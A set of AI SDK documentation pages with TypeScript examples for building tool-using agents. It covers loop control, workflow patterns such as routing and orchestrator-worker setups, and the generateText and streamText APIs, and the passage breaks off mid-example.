const codeAgent = new Agent({
  model: __MODEL__,
  tools: {
    runCode: tool({
      description: 'Execute Python code',
      inputSchema: z.object({
        code: z.string(),
      }),
      execute: async ({ code }) => {
        // Execute code and return result
        return { output: 'Code executed successfully' };
      },
    }),
  },
});

Loop Control

By default, agents run for a single step (stopWhen: stepCountIs(1)). In each step, the model either generates text or calls a tool. If it generates text, the agent completes. If it calls a tool, the AI SDK executes that tool.

To let agents call multiple tools in sequence, configure stopWhen to allow more steps. After each tool execution, the agent triggers a new generation where the model can call another tool or generate text:

import { Experimental_Agent as Agent, stepCountIs } from 'ai';

const agent = new Agent({
  model: __MODEL__,
  stopWhen: stepCountIs(20), // Allow up to 20 steps
});

Each step represents one generation (which results in either text or a tool call). The loop continues until:

The model generates text instead of calling a tool, or
A stop condition is met

You can combine multiple conditions:

import { Experimental_Agent as Agent, stepCountIs } from 'ai';

const agent = new Agent({
  model: __MODEL__,
  stopWhen: [
    stepCountIs(20), // Maximum 20 steps
    yourCustomCondition(), // Custom logic for when to stop
  ],
});

Learn more about loop control and stop conditions.

Tool Choice

Control how the agent uses tools:

import { Experimental_Agent as Agent } from 'ai';

const agent = new Agent({
  model: __MODEL__,
  tools: {
    // your tools here
  },
  toolChoice: 'required', // Force tool use
  // or toolChoice: 'none' to disable tools
  // or toolChoice: 'auto' (default) to let the model decide
});

You can also force the use of a specific tool:

import { Experimental_Agent as Agent } from 'ai';

const agent = new Agent({
  model: __MODEL__,
  tools: {
    weather: weatherTool,
    cityAttractions: attractionsTool,
  },
  toolChoice: {
    type: 'tool',
    toolName: 'weather', // Force the weather tool to be used
  },
});

Structured Output

Define structured output schemas:

import { Experimental_Agent as Agent, Output, stepCountIs } from 'ai';
import { z } from 'zod';

const analysisAgent = new Agent({
  model: __MODEL__,
  experimental_output: Output.object({
    schema: z.object({
      sentiment: z.enum(['positive', 'neutral', 'negative']),
      summary: z.string(),
      keyPoints: z.array(z.string()),
    }),
  }),
  stopWhen: stepCountIs(10),
});

const { experimental_output: output } = await analysisAgent.generate({
  prompt: 'Analyze customer feedback from the last quarter',
});

Define Agent Behavior with System Prompts

System prompts define your agent's behavior, personality, and constraints. They set the context for all interactions and guide how the agent responds to user queries and uses tools.

Basic System Prompts

Set the agent's role and expertise:

const agent = new Agent({
  model: __MODEL__,
  system:
    'You are an expert data analyst. You provide clear insights from complex data.',
});

Detailed Behavioral Instructions

Provide specific guidelines for agent behavior:

const codeReviewAgent = new Agent({
  model: __MODEL__,
  system: `You are a senior software engineer conducting code reviews.

  Your approach:
  - Focus on security vulnerabilities first
  - Identify performance bottlenecks
  - Suggest improvements for readability and maintainability
  - Be constructive and educational in your feedback
  - Always explain why something is an issue and how to fix it`,
});

Constrain Agent Behavior

Set boundaries and ensure consistent behavior:

const customerSupportAgent = new Agent({
  model: __MODEL__,
  system: `You are a customer support specialist for an e-commerce platform.

  Rules:
  - Never make promises about refunds without checking the policy
  - Always be empathetic and professional
  - If you don't know something, say so and offer to escalate
  - Keep responses concise and actionable
  - Never share internal company information`,
  tools: {
    checkOrderStatus,
    lookupPolicy,
    createTicket,
  },
});

Tool Usage Instructions

Guide how the agent should use available tools:

const researchAgent = new Agent({
  model: __MODEL__,
  system: `You are a research assistant with access to search and document tools.

  When researching:
  1. Always start with a broad search to understand the topic
  2. Use document analysis for detailed information
  3. Cross-reference multiple sources before drawing conclusions
  4. Cite your sources when presenting information
  5. If information conflicts, present both viewpoints`,
  tools: {
    webSearch,
    analyzeDocument,
    extractQuotes,
  },
});

Format and Style Instructions

Control the output format and communication style:

const technicalWriterAgent = new Agent({
  model: __MODEL__,
  system: `You are a technical documentation writer.

  Writing style:
  - Use clear, simple language
  - Avoid jargon unless necessary
  - Structure information with headers and bullet points
  - Include code examples where relevant
  - Write in second person ("you" instead of "the user")

  Always format responses in Markdown.`,
});

Using an Agent

Once defined, you can use your agent in three ways:

Generate Text

Use generate() for one-time text generation:

const result = await myAgent.generate({
  prompt: 'What is the weather like?',
});

console.log(result.text);

Stream Text

Use stream() for streaming responses:

const stream = myAgent.stream({
  prompt: 'Tell me a story',
});

for await (const chunk of stream.textStream) {
  console.log(chunk);
}

Respond to UI Messages

Use respond() to create API responses for client applications:

// In your API route (e.g., app/api/chat/route.ts)
import { validateUIMessages } from 'ai';

export async function POST(request: Request) {
  const { messages } = await request.json();

  return myAgent.respond({
    messages: await validateUIMessages({ messages }),
  });
}

End-to-end Type Safety

You can infer types for your Agent's UIMessages:

import {
  Experimental_Agent as Agent,
  Experimental_InferAgentUIMessage as InferAgentUIMessage,
} from 'ai';

const myAgent = new Agent({
  // ... configuration
});

// Infer the UIMessage type for UI components or persistence
export type MyAgentUIMessage = InferAgentUIMessage<typeof myAgent>;

Use this type in your client components with useChat:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyAgentUIMessage } from '@/agent/my-agent';

export function Chat() {
  const { messages } = useChat<MyAgentUIMessage>();
  // Full type safety for your messages and tools
}

Next Steps

Now that you understand building agents, you can:

Explore workflow patterns for structured patterns using core functions
Learn about loop control for advanced execution control
See manual loop examples for custom workflow implementations

title: Workflow Patterns description: Learn workflow patterns for building reliable agents with the AI SDK.

Workflow Patterns

Combine the building blocks from the overview with these patterns to add structure and reliability to your agents:

Sequential Processing - Steps executed in order
Parallel Processing - Independent tasks run simultaneously
Evaluation/Feedback Loops - Results checked and improved iteratively
Orchestration - Coordinating multiple components
Routing - Directing work based on context

Choose Your Approach

Consider these key factors:

Flexibility vs Control - How much freedom does the LLM need vs how tightly you must constrain its actions?
Error Tolerance - What are the consequences of mistakes in your use case?
Cost Considerations - More complex systems typically mean more LLM calls and higher costs
Maintenance - Simpler architectures are easier to debug and modify

Start with the simplest approach that meets your needs. Add complexity only when required by:

Breaking down tasks into clear steps
Adding tools for specific capabilities
Implementing feedback loops for quality control
Introducing multiple agents for complex workflows

Let's look at examples of these patterns in action.

Patterns with Examples

These patterns, adapted from Anthropic's guide on building effective agents, serve as building blocks you can combine to create comprehensive workflows. Each pattern addresses specific aspects of task execution. Combine them thoughtfully to build reliable solutions for complex problems.

Sequential Processing (Chains)

The simplest workflow pattern executes steps in a predefined order. Each step's output becomes input for the next step, creating a clear chain of operations. Use this pattern for tasks with well-defined sequences, like content generation pipelines or data transformation processes.

import { generateText, generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function generateMarketingCopy(input: string) {
  const model = __MODEL__;

  // First step: Generate marketing copy
  const { text: copy } = await generateText({
    model,
    prompt: `Write persuasive marketing copy for: ${input}. Focus on benefits and emotional appeal.`,
  });

  // Perform quality check on copy
  const { object: qualityMetrics } = await generateObject({
    model,
    schema: z.object({
      hasCallToAction: z.boolean(),
      emotionalAppeal: z.number().min(1).max(10),
      clarity: z.number().min(1).max(10),
    }),
    prompt: `Evaluate this marketing copy for:
    1. Presence of call to action (true/false)
    2. Emotional appeal (1-10)
    3. Clarity (1-10)

    Copy to evaluate: ${copy}`,
  });

  // If quality check fails, regenerate with more specific instructions
  if (
    !qualityMetrics.hasCallToAction ||
    qualityMetrics.emotionalAppeal < 7 ||
    qualityMetrics.clarity < 7
  ) {
    const { text: improvedCopy } = await generateText({
      model,
      prompt: `Rewrite this marketing copy with:
      ${!qualityMetrics.hasCallToAction ? '- A clear call to action' : ''}
      ${qualityMetrics.emotionalAppeal < 7 ? '- Stronger emotional appeal' : ''}
      ${qualityMetrics.clarity < 7 ? '- Improved clarity and directness' : ''}

      Original copy: ${copy}`,
    });
    return { copy: improvedCopy, qualityMetrics };
  }

  return { copy, qualityMetrics };
}

Routing

This pattern lets the model decide which path to take through a workflow based on context and intermediate results. The model acts as an intelligent router, directing the flow of execution between different branches of your workflow. Use this when handling varied inputs that require different processing approaches. In the example below, the first LLM call's results determine the second call's model size and system prompt.

import { generateObject, generateText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function handleCustomerQuery(query: string) {
  const model = __MODEL__;

  // First step: Classify the query type
  const { object: classification } = await generateObject({
    model,
    schema: z.object({
      reasoning: z.string(),
      type: z.enum(['general', 'refund', 'technical']),
      complexity: z.enum(['simple', 'complex']),
    }),
    prompt: `Classify this customer query:
    ${query}

    Determine:
    1. Query type (general, refund, or technical)
    2. Complexity (simple or complex)
    3. Brief reasoning for classification`,
  });

  // Route based on classification
  // Set model and system prompt based on query type and complexity
  const { text: response } = await generateText({
    model:
      classification.complexity === 'simple'
        ? 'openai/gpt-4o-mini'
        : 'openai/o4-mini',
    system: {
      general:
        'You are an expert customer service agent handling general inquiries.',
      refund:
        'You are a customer service agent specializing in refund requests. Follow company policy and collect necessary information.',
      technical:
        'You are a technical support specialist with deep product knowledge. Focus on clear step-by-step troubleshooting.',
    }[classification.type],
    prompt: query,
  });

  return { response, classification };
}

Parallel Processing

Break down tasks into independent subtasks that execute simultaneously. This pattern uses parallel execution to improve efficiency while maintaining the benefits of structured workflows. For example, analyze multiple documents or process different aspects of a single input concurrently (like code review).

import { generateText, generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Example: Parallel code review with multiple specialized reviewers
async function parallelCodeReview(code: string) {
  const model = __MODEL__;

  // Run parallel reviews
  const [securityReview, performanceReview, maintainabilityReview] =
    await Promise.all([
      generateObject({
        model,
        system:
          'You are an expert in code security. Focus on identifying security vulnerabilities, injection risks, and authentication issues.',
        schema: z.object({
          vulnerabilities: z.array(z.string()),
          riskLevel: z.enum(['low', 'medium', 'high']),
          suggestions: z.array(z.string()),
        }),
        prompt: `Review this code:
      ${code}`,
      }),

      generateObject({
        model,
        system:
          'You are an expert in code performance. Focus on identifying performance bottlenecks, memory leaks, and optimization opportunities.',
        schema: z.object({
          issues: z.array(z.string()),
          impact: z.enum(['low', 'medium', 'high']),
          optimizations: z.array(z.string()),
        }),
        prompt: `Review this code:
      ${code}`,
      }),

      generateObject({
        model,
        system:
          'You are an expert in code quality. Focus on code structure, readability, and adherence to best practices.',
        schema: z.object({
          concerns: z.array(z.string()),
          qualityScore: z.number().min(1).max(10),
          recommendations: z.array(z.string()),
        }),
        prompt: `Review this code:
      ${code}`,
      }),
    ]);

  const reviews = [
    { ...securityReview.object, type: 'security' },
    { ...performanceReview.object, type: 'performance' },
    { ...maintainabilityReview.object, type: 'maintainability' },
  ];

  // Aggregate results using another model instance
  const { text: summary } = await generateText({
    model,
    system: 'You are a technical lead summarizing multiple code reviews.',
    prompt: `Synthesize these code review results into a concise summary with key actions:
    ${JSON.stringify(reviews, null, 2)}`,
  });

  return { reviews, summary };
}

Orchestrator-Worker

A primary model (orchestrator) coordinates the execution of specialized workers. Each worker optimizes for a specific subtask, while the orchestrator maintains overall context and ensures coherent results. This pattern excels at complex tasks requiring different types of expertise or processing.

import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function implementFeature(featureRequest: string) {
  // Orchestrator: Plan the implementation
  const { object: implementationPlan } = await generateObject({
    model: __MODEL__,
    schema: z.object({
      files: z.array(
        z.object({
          purpose: z.string(),
          filePath: z.string(),
          changeType: z.enum(['create', 'modify', 'delete']),
        }),
      ),
      estimatedComplexity: z.enum(['low', 'medium', 'high']),
    }),
    system:
      'You are a senior software architect planning feature implementations.',
    prompt: `Analyze this feature request and create an implementation plan:
    ${featureRequest}`,
  });

  // Workers: Execute the planned changes
  const fileChanges = await Promise.all(
    implementationPlan.files.map(async file => {
      // Each worker is specialized for the type of change
      const workerSystemPrompt = {
        create:
          'You are an expert at implementing new files following best practices and project patterns.',
        modify:
          'You are an expert at modifying existing code while maintaining consistency and avoiding regressions.',
        delete:
          'You are an expert at safely removing code while ensuring no breaking changes.',
      }[file.changeType];

      const { object: change } = await generateObject({
        model: __MODEL__,
        schema: z.object({
          explanation: z.string(),
          code: z.string(),
        }),
        system: workerSystemPrompt,
        prompt: `Implement the changes for ${file.filePath} to support:
        ${file.purpose}

        Consider the overall feature context:
        ${featureRequest}`,
      });

      return {
        file,
        implementation: change,
      };
    }),
  );

  return {
    plan: implementationPlan,
    changes: fileChanges,
  };
}

Evaluator-Optimizer

Add quality control to workflows with dedicated evaluation steps that assess intermediate results. Based on the evaluation, the workflow proceeds, retries with adjusted parameters, or takes corrective action. This creates robust workflows capable of self-improvement and error recovery.

import { generateText, generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function translateWithFeedback(text: string, targetLanguage: string) {
  let currentTranslation = '';
  let iterations = 0;
  const MAX_ITERATIONS = 3;

  // Initial translation
  const { text: translation } = await generateText({
    model: __MODEL__,
    system: 'You are an expert literary translator.',
    prompt: `Translate this text to ${targetLanguage}, preserving tone and cultural nuances:
    ${text}`,
  });

  currentTranslation = translation;

  // Evaluation-optimization loop
  while (iterations < MAX_ITERATIONS) {
    // Evaluate current translation
    const { object: evaluation } = await generateObject({
      model: __MODEL__,
      schema: z.object({
        qualityScore: z.number().min(1).max(10),
        preservesTone: z.boolean(),
        preservesNuance: z.boolean(),
        culturallyAccurate: z.boolean(),
        specificIssues: z.array(z.string()),
        improvementSuggestions: z.array(z.string()),
      }),
      system: 'You are an expert in evaluating literary translations.',
      prompt: `Evaluate this translation:

      Original: ${text}
      Translation: ${currentTranslation}

      Consider:
      1. Overall quality
      2. Preservation of tone
      3. Preservation of nuance
      4. Cultural accuracy`,
    });

    // Check if quality meets threshold
    if (
      evaluation.qualityScore >= 8 &&
      evaluation.preservesTone &&
      evaluation.preservesNuance &&
      evaluation.culturallyAccurate
    ) {
      break;
    }

    // Generate improved translation based on feedback
    const { text: improvedTranslation } = await generateText({
      model: __MODEL__,
      system: 'You are an expert literary translator.',
      prompt: `Improve this translation based on the following feedback:
      ${evaluation.specificIssues.join('\n')}
      ${evaluation.improvementSuggestions.join('\n')}

      Original: ${text}
      Current Translation: ${currentTranslation}`,
    });

    currentTranslation = improvedTranslation;
    iterations++;
  }

  return {
    finalTranslation: currentTranslation,
    iterationsRequired: iterations,
  };
}

title: Loop Control description: Control agent execution with built-in loop management using stopWhen and prepareStep

Loop Control

You can control both the execution flow and the settings at each step of the agent loop. The AI SDK provides built-in loop control through two parameters: stopWhen for defining stopping conditions and prepareStep for modifying settings (model, tools, messages, and more) between steps.

Stop Conditions

The stopWhen parameter controls when to stop execution when there are tool results in the last step. By default, agents stop after a single step using stepCountIs(1).

When you provide stopWhen, the agent continues executing after tool calls until a stopping condition is met. When the condition is an array, execution stops when any of the conditions are met.

Use Built-in Conditions

The AI SDK provides several built-in stopping conditions:

import { Experimental_Agent as Agent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const agent = new Agent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: stepCountIs(20), // Stop after 20 steps maximum
});

const result = await agent.generate({
  prompt: 'Analyze this dataset and create a summary report',
});

Combine Multiple Conditions

Combine multiple stopping conditions. The loop stops when it meets any condition:

import { Experimental_Agent as Agent, stepCountIs, hasToolCall } from 'ai';
__PROVIDER_IMPORT__;

const agent = new Agent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: [
    stepCountIs(20), // Maximum 20 steps
    hasToolCall('someTool'), // Stop after calling 'someTool'
  ],
});

const result = await agent.generate({
  prompt: 'Research and analyze the topic',
});

Create Custom Conditions

Build custom stopping conditions for specific requirements:

import { Experimental_Agent as Agent, StopCondition, ToolSet } from 'ai';
__PROVIDER_IMPORT__;

const tools = {
  // your tools
} satisfies ToolSet;

const hasAnswer: StopCondition<typeof tools> = ({ steps }) => {
  // Stop when the model generates text containing "ANSWER:"
  return steps.some(step => step.text?.includes('ANSWER:')) ?? false;
};

const agent = new Agent({
  model: __MODEL__,
  tools,
  stopWhen: hasAnswer,
});

const result = await agent.generate({
  prompt: 'Find the answer and respond with "ANSWER: [your answer]"',
});

Custom conditions receive step information across all steps:

const budgetExceeded: StopCondition<typeof tools> = ({ steps }) => {
  const totalUsage = steps.reduce(
    (acc, step) => ({
      inputTokens: acc.inputTokens + (step.usage?.inputTokens ?? 0),
      outputTokens: acc.outputTokens + (step.usage?.outputTokens ?? 0),
    }),
    { inputTokens: 0, outputTokens: 0 },
  );

  const costEstimate =
    (totalUsage.inputTokens * 0.01 + totalUsage.outputTokens * 0.03) / 1000;
  return costEstimate > 0.5; // Stop if cost exceeds $0.50
};

Prepare Step

The prepareStep callback runs before each step in the loop and defaults to the initial settings if you don't return any changes. Use it to modify settings, manage context, or implement dynamic behavior based on execution history.

Dynamic Model Selection

Switch models based on step requirements:

import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new Agent({
  model: 'openai/gpt-5.1-mini', // Default model
  tools: {
    // your tools
  },
  prepareStep: async ({ stepNumber, messages }) => {
    // Use a stronger model for complex reasoning after initial steps
    if (stepNumber > 2 && messages.length > 10) {
      return {
        model: __MODEL__,
      };
    }
    // Continue with default settings
    return {};
  },
});

const result = await agent.generate({
  prompt: '...',
});

Context Management

Manage growing conversation history in long-running loops:

import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new Agent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  prepareStep: async ({ messages }) => {
    // Keep only recent messages to stay within context limits
    if (messages.length > 20) {
      return {
        messages: [
          messages[0], // Keep system message
          ...messages.slice(-10), // Keep last 10 messages
        ],
      };
    }
    return {};
  },
});

const result = await agent.generate({
  prompt: '...',
});

Tool Selection

Control which tools are available at each step:

import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new Agent({
  model: __MODEL__,
  tools: {
    search: searchTool,
    analyze: analyzeTool,
    summarize: summarizeTool,
  },
  prepareStep: async ({ stepNumber, steps }) => {
    // Search phase (steps 0-2)
    if (stepNumber <= 2) {
      return {
        activeTools: ['search'],
        toolChoice: 'required',
      };
    }

    // Analysis phase (steps 3-5)
    if (stepNumber <= 5) {
      return {
        activeTools: ['analyze'],
      };
    }

    // Summary phase (step 6+)
    return {
      activeTools: ['summarize'],
      toolChoice: 'required',
    };
  },
});

const result = await agent.generate({
  prompt: '...',
});

You can also force a specific tool to be used:

prepareStep: async ({ stepNumber }) => {
  if (stepNumber === 0) {
    // Force the search tool to be used first
    return {
      toolChoice: { type: 'tool', toolName: 'search' },
    };
  }

  if (stepNumber === 5) {
    // Force the summarize tool after analysis
    return {
      toolChoice: { type: 'tool', toolName: 'summarize' },
    };
  }

  return {};
};

Message Modification

Transform messages before sending them to the model:

import { Experimental_Agent as Agent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new Agent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  prepareStep: async ({ messages, stepNumber }) => {
    // Summarize tool results to reduce token usage
    const processedMessages = messages.map(msg => {
      if (msg.role === 'tool' && msg.content.length > 1000) {
        return {
          ...msg,
          content: summarizeToolResult(msg.content),
        };
      }
      return msg;
    });

    return { messages: processedMessages };
  },
});

const result = await agent.generate({
  prompt: '...',
});

Access Step Information

Both stopWhen and prepareStep receive detailed information about the current execution:

prepareStep: async ({
  model, // Current model configuration
  stepNumber, // Current step number (0-indexed)
  steps, // All previous steps with their results
  messages, // Messages to be sent to the model
}) => {
  // Access previous tool calls and results
  const previousToolCalls = steps.flatMap(step => step.toolCalls);
  const previousResults = steps.flatMap(step => step.toolResults);

  // Make decisions based on execution history
  if (previousToolCalls.some(call => call.toolName === 'dataAnalysis')) {
    return {
      toolChoice: { type: 'tool', toolName: 'reportGenerator' },
    };
  }

  return {};
},

Manual Loop Control

For scenarios requiring complete control over the agent loop, you can use AI SDK Core functions (generateText and streamText) to implement your own loop management instead of using stopWhen and prepareStep. This approach provides maximum flexibility for complex workflows.

Implementing a Manual Loop

Build your own agent loop when you need full control over execution:

import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;

const messages: ModelMessage[] = [{ role: 'user', content: '...' }];

let step = 0;
const maxSteps = 10;

while (step < maxSteps) {
  const result = await generateText({
    model: __MODEL__,
    messages,
    tools: {
      // your tools here
    },
  });

  messages.push(...result.response.messages);

  if (result.text) {
    break; // Stop when model generates text
  }

  step++;
}

This manual approach gives you complete control over:

Message history management
Step-by-step decision making
Custom stopping conditions
Dynamic tool and model selection
Error handling and recovery

Learn more about manual agent loops in the cookbook.

title: Agents description: An overview of building agents with the AI SDK.

Agents

The following section show you how to build agents with the AI SDK - systems where large language models (LLMs) use tools in a loop to accomplish tasks.

title: Overview description: An overview of AI SDK Core.

AI SDK Core

For example, here’s how you can generate text with various models using the AI SDK:

AI SDK Core Functions

generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
streamText: Stream text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.
generateObject: Generates a typed, structured object that matches a Zod schema. You can use this function to force the language model to return structured data, e.g. for information extraction, synthetic data generation, or classification tasks.
streamObject: Stream a structured object that matches a Zod schema. You can use this function to stream generated UIs.

API Reference

Please check out the AI SDK Core API Reference for more details on each function.

title: Generating Text description: Learn how to generate text with the AI SDK.

Generating and Streaming Text

The AI SDK Core provides two functions to generate text and stream it from LLMs:

generateText: Generates text for a given prompt and model.
streamText: Streams text from a given prompt and model.

Advanced LLM features such as tool calling and structured data generation are built on top of text generation.

`generateText`

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can use more advanced prompts to generate text with more complex instructions and content:

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  system:
    'You are a professional writer. ' +
    'You write simple, clear, and concise content.',
  prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});

The result object of generateText contains several promises that resolve when all required data is available:

result.content: The content that was generated in the last step.
result.text: The generated text.
result.reasoning: The full reasoning that the model has generated in the last step.
result.reasoningText: The reasoning text of the model (only available for some models).
result.files: The files that were generated in the last step.
result.sources: Sources that have been used as references in the last step (only available for some models).
result.toolCalls: The tool calls that were made in the last step.
result.toolResults: The results of the tool calls from the last step.
result.finishReason: The reason the model finished generating text.
result.usage: The usage of the model during the final step of text generation.
result.totalUsage: The total usage across all steps (for multi-step generations).
result.warnings: Warnings from the model provider (e.g. unsupported settings).
result.request: Additional request information.
result.response: Additional response information, including response messages and body.
result.providerMetadata: Additional provider-specific metadata.
result.steps: Details for all steps, useful for getting information about intermediate steps.
result.experimental_output: The generated structured output using the experimental_output specification.

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText } from 'ai';

const result = await generateText({
  // ...
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

`streamText`

AI SDK Core provides the streamText function which simplifies streaming text from LLMs:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
});

// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
  console.log(textPart);
}

You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC. The result object contains several helper functions to make the integration into AI SDK UI easier:

result.toUIMessageStreamResponse(): Creates a UI Message stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
result.pipeUIMessageStreamToResponse(): Writes UI Message stream delta output to a Node.js response-like object.
result.toTextStreamResponse(): Creates a simple text stream HTTP response.
result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.

It also provides several promises that resolve when the stream is finished:

result.content: The content that was generated in the last step.
result.text: The generated text.
result.reasoning: The full reasoning that the model has generated.
result.reasoningText: The reasoning text of the model (only available for some models).
result.files: Files that have been generated by the model in the last step.
result.sources: Sources that have been used as references in the last step (only available for some models).
result.toolCalls: The tool calls that have been executed in the last step.
result.toolResults: The tool results that have been generated in the last step.
result.finishReason: The reason the model finished generating text.
result.usage: The usage of the model during the final step of text generation.
result.totalUsage: The total usage across all steps (for multi-step generations).
result.warnings: Warnings from the model provider (e.g. unsupported settings).
result.steps: Details for all steps, useful for getting information about intermediate steps.
result.request: Additional request information from the last step.
result.response: Additional response information from the last step.
result.providerMetadata: Additional provider-specific metadata from the last step.

`onError` callback

streamText immediately starts streaming to enable sending data without waiting for the model. Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.

To log errors, you can provide an onError callback that is triggered when an error occurs.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onError({ error }) {
    console.error(error); // your error logging logic here
  },
});

`onChunk` callback

When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.

It receives the following chunk types:

text
reasoning
source
tool-call
tool-input-start
tool-input-delta
tool-result
raw

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onChunk({ chunk }) {
    // implement your own logic here, e.g.:
    if (chunk.type === 'text') {
      console.log(chunk.text);
    }
  },
});

`onFinish` callback

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
    // your own logic, e.g. for saving the chat history or recording usage

    const messages = response.messages; // messages that were generated
  },
});

`fullStream` property

import { streamText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = streamText({
  model: __MODEL__,
  tools: {
    cityAttractions: {
      inputSchema: z.object({ city: z.string() }),
      execute: async ({ city }) => ({
        attractions: ['attraction1', 'attraction2', 'attraction3'],
      }),
    },
  },
  prompt: 'What are some San Francisco tourist attractions?',
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'start': {
      // handle start of stream
      break;
    }
    case 'start-step': {
      // handle start of step
      break;
    }
    case 'text-start': {
      // handle text start
      break;
    }
    case 'text-delta': {
      // handle text delta here
      break;
    }
    case 'text-end': {
      // handle text end
      break;
    }
    case 'reasoning-start': {
      // handle reasoning start
      break;
    }
    case 'reasoning-delta': {
      // handle reasoning delta here
      break;
    }
    case 'reasoning-end': {
      // handle reasoning end
      break;
    }
    case 'source': {
      // handle source here
      break;
    }
    case 'file': {
      // handle file here
      break;
    }
    case 'tool-call': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool call here
          break;
        }
      }
      break;
    }
    case 'tool-input-start': {
      // handle tool input start
      break;
    }
    case 'tool-input-delta': {
      // handle tool input delta
      break;
    }
    case 'tool-input-end': {
      // handle tool input end
      break;
    }
    case 'tool-result': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool result here
          break;
        }
      }
      break;
    }
    case 'tool-error': {
      // handle tool error
      break;
    }
    case 'finish-step': {
      // handle finish step
      break;
    }
    case 'finish': {
      // handle finish here
      break;
    }
    case 'error': {
      // handle error here
      break;
    }
    case 'raw': {
      // handle raw value
      break;
    }
  }
}

Stream transformation

You can use the experimental_transform option to transform the stream. This is useful for e.g. filtering, changing, or smoothing the text stream.

Smoothing streams

The AI SDK Core provides a smoothStream function that can be used to smooth out text streaming.

import { smoothStream, streamText } from 'ai';

const result = streamText({
  model,
  prompt,
  experimental_transform: smoothStream(),
});

Custom transformations

Here is an example of how to implement a custom transformation that converts all text to uppercase:

const upperCaseTransform =
  <TOOLS extends ToolSet>() =>
  (options: { tools: TOOLS; stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      transform(chunk, controller) {
        controller.enqueue(
          // for text chunks, convert the text to uppercase:
          chunk.type === 'text'
            ? { ...chunk, text: chunk.text.toUpperCase() }
            : chunk,
        );
      },
    });

You can also stop the stream using the stopStream function. This is e.g. useful if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.

When you invoke stopStream, it is important to simulate the step-finish and finish events to guarantee that a well-formed stream is returned and all callbacks are invoked.

const stopWordTransform =
  <TOOLS extends ToolSet>() =>
  ({ stopStream }: { stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      // note: this is a simplified transformation for testing;
      // in a real-world version more there would need to be
      // stream buffering and scanning to correctly emit prior text
      // and to detect all STOP occurrences.
      transform(chunk, controller) {
        if (chunk.type !== 'text') {
          controller.enqueue(chunk);
          return;
        }

        if (chunk.text.includes('STOP')) {
          // stop the stream
          stopStream();

          // simulate the finish-step event
          controller.enqueue({
            type: 'finish-step',
            finishReason: 'stop',
            logprobs: undefined,
            usage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
            request: {},
            response: {
              id: 'response-id',
              modelId: 'mock-model-id',
              timestamp: new Date(0),
            },
            warnings: [],
            isContinued: false,
          });

          // simulate the finish event
          controller.enqueue({
            type: 'finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
            response: {
              id: 'response-id',
              modelId: 'mock-model-id',
              timestamp: new Date(0),
            },
          });

          return;
        }

        controller.enqueue(chunk);
      },
    });

Multiple transformations

You can also provide multiple transformations. They are applied in the order they are provided.

const result = streamText({
  model,
  prompt,
  experimental_transform: [firstTransform, secondTransform],
});

Sources

Some providers such as Perplexity and Google Generative AI include sources in the response.

Currently sources are limited to web pages that ground the response. You can access them using the sources property of the result.

Each url source contains the following properties:

id: The ID of the source.
url: The URL of the source.
title: The optional title of the source.
providerMetadata: Provider metadata for the source.

When you use generateText, you can access the sources using the sources property:

const result = await generateText({
  model: 'google/gemini-2.5-flash',
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for (const source of result.sources) {
  if (source.sourceType === 'url') {
